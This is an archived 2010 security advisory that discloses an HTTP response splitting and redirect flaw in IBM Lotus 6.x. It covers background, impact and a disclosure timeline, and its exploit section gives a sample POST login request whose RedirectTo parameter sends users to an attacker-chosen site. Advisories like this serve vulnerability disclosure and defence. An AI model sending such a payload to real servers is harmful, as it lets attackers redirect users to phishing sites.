TUCoPS :: IBM(multi) :: bu-2047.htm

IBM Lotus 6.x HTTP Response Splitting Vulnerability
IBM Lotus 6.x HTTP Response Splitting Vulnerability
IBM Lotus 6.x HTTP Response Splitting Vulnerability


==========================================0D
Yaniv Miron aka "Lament" Advisory March 12, 2010=0D
IBM Lotus 6.x HTTP Response Splitting Vulnerability=0D
==========================================0D
=0D
======================0D
I. BACKGROUND=0D
======================0D
=0D
IBM Lotus Software delivers robust collaboration software that empowers=0D
people to connect, collaborate, and innovate while optimizing the way they=0D
work. With Lotus you can drive better business outcomes through=0D
smarter collaboration.=0D
=0D
http://www-01.ibm.com/software/lotus/=0D 
=0D
======================0D
II. DESCRIPTION=0D
======================0D
=0D
A malicious attacker may redirect users from the IBM Lotus application.=0D
=0D
======================0D
III. ANALYSIS=0D
======================0D
=0D
Exploitation of this vulnerability results in the redirection of users using a malicious POST.=0D
=0D
======================0D
IV. EXPLOIT=0D
======================0D
=0D
POST /names.nsf?Login HTTP/1.1=0D
=0D
Connection: Keep-Alive=0D
=0D
%25%25ModDate=xxxxxxxxxxxxxxxx&Username=yyyy+zzzz&Password=aaaaaa&RedirectTo=http://www.RedirectExample.com&SaveOptions=0&...=0D 
=0D
======================0D
V. DISCLOSURE TIMELINE=0D
======================0D
=0D
Jan 2009 Vulnerability found=0D
Jan 2009 Vendor Notification=0D
March 2010 Public Disclosure=0D
=0D
======================0D
VI. CREDIT=0D
======================0D
=0D
Yaniv Miron aka "Lament".=0D
lament@ilhack.org

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH